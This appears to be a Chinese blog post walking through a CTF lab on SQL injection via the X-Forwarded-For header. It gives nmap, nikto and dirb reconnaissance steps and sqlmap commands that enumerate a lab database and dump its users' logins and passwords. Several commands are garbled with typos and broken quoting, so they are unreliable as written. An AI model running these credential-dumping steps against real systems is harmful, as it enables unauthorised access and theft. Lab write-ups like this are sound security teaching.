CTF实验:X-Forwarded-For头注入

SQL注入漏洞介绍

SQL注入攻击指用用户构建特殊的输入作为参数传入Web应用程序,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。
任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中;

信息探测

扫描主机服务信息以及服务版本
– nmap -sV 靶场IP地址
快速扫描主机全部信息
– nmap -T4 –A -v 靶场IP地址
探测敏感信息
– nikto -host http://靶场IP地址:端口
dirb http://ip:端口
在这里插入图片描述
发现敏感页面打开,需要用户名和密码
在这里插入图片描述

漏洞扫描

漏洞扫描器 AVWS
功能强大,专注于web安全的漏洞扫描器
在这里插入图片描述
发现高危漏洞,利用它
在这里插入图片描述
查看详细信息,是SQL盲注,X-Forwarded-For头注入
在这里插入图片描述

漏洞利用

利用sqlmap
对扫描的结果进行分析。注意:如果具有SQL注入漏洞,可以直接利用。毕竟SQL注入是高危漏洞,可以直接获取服务器权限。

使用sqlmap利用SQL注入漏洞

– sqlmap -u url –headers=“X-Forwarded-For:” –dbs 查看数据库名 --batch
– sqlmap -u url –headers=“X-Forwarded-For:
”–D “数据库名” –tables 查看对应数据库中的数据表 --batch
– sqlmap -u url –headers=“X-Forwarded-For:”–D “数据库名” –T “表名” –columns 查看对应字段 --batch
– sqlmap -u url –headers=“X-Forwarded-For:
” –D “数据库名” –T “表名”-C “列名” –dump --batch

sqlmap -u “http://ip” --headers=“X-Forwarded-For:*” --dbs --batch![在这里插入图片描述](https://img-blog.csdnimg.cn/2020040122165548.JPG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2Zsb3lkX2FydA==,size_16,color_FFFFFF,在这里插入图片描述
在这里插入图片描述

sqlmap -u “http://ip” --headers=“X-Forwarded-For:*” -D phototblog --tables --batch

sqlmap -u “http://ip” --headers=“X-forwarede-For:" -D photoblog -T users --columns --batch
在这里插入图片描述
在这里插入图片描述
sqlmap -u “http://ip” --headers="X-Forwarede-For=:
” -D photoblog -T users -C password,login --dump --batch
在这里插入图片描述
获得了用户名和密码

总结

只要是用户可以输入的位置都是有可能存在注入点的

  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值